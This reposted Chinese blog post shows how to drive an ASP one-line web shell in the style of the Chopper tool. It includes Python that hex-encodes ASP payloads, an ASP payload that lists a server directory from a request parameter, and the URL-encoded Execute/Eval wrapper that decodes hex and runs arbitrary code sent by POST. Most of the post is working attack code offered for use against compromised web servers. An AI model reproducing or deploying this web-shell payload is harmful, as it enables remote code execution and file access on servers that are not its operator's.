读取文件
self.asp_data=txt_Handle.asp_Handle(self.open_txt("asp.asp")) #asp内容
def asp_Handle(ASP_data): ASP_data=asp_x0_zs(ASP_data) #清除<% %> #ASP_data=asp_x2_zs(ASP_data) #清除'注释 #ASP_data=open_file_null(ASP_data) #清除空行 #ASP_data=asp_x2_zs(ASP_data) #清除'注释 #ASP_data=str_char(ASP_data) #对字符串处理 #ASP_data=urllib.quote(ASP_data) #quote URL编码 print ASP_data ASP_data=asp_shell(binascii.b2a_hex(ASP_data.encode("utf8"))) #hex #ASP_data=urllib.quote(ASP_data) #quote URL编码 return ASP_data
对ASP代码做一些处理
Dim RR:RR=bd(Request("z1")):Function FD(dt):FD=Year(dt)&"-":If Len(Month(dt))=1 Then:FD = FD&"0":End If:FD=FD&Month(dt)&"-":If Len(Day(dt))=1 Then:FD=FD&"0":End If:FD=FD&Day(dt)&" "&FormatDateTime(dt,4)&":":If Len(Second(dt))=1 Then:FD=FD&"0":End If:FD=FD&Second(dt):End Function:SET C=CreateObject("Scripting.FileSystemObject"):Set FO=C.GetFolder(""&RR&""):If Err Then:Response.Write("ERROR:// "&Err.Description):Err.Clear:Else:For Each F in FO.subfolders:Response.Write F.Name&chr(47)&chr(9)&FD(F.DateLastModified)&chr(9)&chr(48)&chr(9)&C.GetFolder(F.Path).attributes&chr(10):Next:For Each L in FO.files:Response.Write L.Name&chr(9)&FD(L.DateLastModified)&chr(9)&L.size&chr(9)&C.GetFile(L.Path).attributes&chr(10):Next:End If
在看菜刀的时候看菜刀对内容做出了一些处理
但是在菜刀的自写脚本中 并未对特殊字符做出处理 但是我在测试的时候还是发现还是要对一些字符做出处理否则无法运行 比如“
Response.Write("http://blog.csdn.net/webxscan")
strA = "document.write("&chr(34)&");"
##################################################################
上边说的是代码部分的处理
下面说代码的执行
{PASS}=Execute("Execute(""On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(""""->|""""):Execute(""""On+Error+Resume+Next:""""%26bd(""""{SCRIPT}"""")):Response.Write(""""|<-""""):Response.End"")")
#########
long=Eval ("Execute(""On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(""""->|""""):Execute(""""On+Error+Resume+Next:""""%26bd(""""----------------"""")):Response.Write(""""|<-""""):Response.End"")")
这是执行 将代码转换成hex就行了放在{SCRIPT} 里
然后POST提交就行了
有兴趣可以联系我 神龙:QQ:29295842
blog: http://blog.csdn.net/webxscan
转载自原文链接, 如需删除请联系管理员。
原文链接:ASP 一句话执行ASP代码,转载请注明来源!